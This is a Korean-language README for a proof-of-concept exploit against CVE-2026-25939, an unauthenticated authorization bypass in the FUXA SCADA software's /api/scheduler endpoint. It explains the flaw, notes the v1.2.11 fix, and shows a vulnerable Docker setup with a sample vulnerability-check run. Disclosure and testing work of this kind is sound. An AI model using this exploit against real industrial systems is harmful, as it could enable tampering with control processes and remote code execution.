
CVE-2026-25939에 대한 개념 증명 익스플로잇으로, FUXA SCADA 소프트웨어의 인증되지 않은 권한 부여 우회를 통해 임의 스케줄러 조작 및 잠재적 RCE를 허용합니다.
Mohammed Idrees Banyamer 보안 연구원
이 저장소는 FUXA(오픈소스 SCADA/ICS 소프트웨어)의 심각한 권한 부여 우회 취약점인 CVE-2026-25939에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이 취약점은 인증되지 않은 원격 공격자가 임의의 스케줄러 항목을 생성, 수정 및 삭제할 수 있게 하여, 잠재적으로 원격 코드 실행과 산업 제어 시스템 조작으로 이어질 수 있습니다.
이 취약점은 /api/scheduler 엔드포인트에 존재하며, POST 및 DELETE 핸들러 모두에서 게스트 사용자 인증 검사가 누락되었습니다. v1.2.11의 패치는 명시적인 authJwt.isGuestUser() 검증을 추가했습니다.
POST /api/scheduler - 스케줄러 생성/수정DELETE /api/scheduler - 스케줄러 삭제예시 1: 취약점 평가
docker run -p 1881:1881 -d fuxa:v1.2.10
$ python CVE-2026-25939.py http://192.168.1.100:1881 --check
[*] http://192.168.1.100:1881에 대한 취약점 상태 확인 중
[*] 스케줄러 API에 대한 게스트 접근 테스트 중...
[*] GET 응답 상태: 200
[*] 스케줄러 생성 테스트 중...
[*] POST 응답 상태: 200
[!] 취약함: 대상이 인증되지 않은 스케줄러 생성을 허용함
[!] 이는 버전 < 1.2.11을 나타냄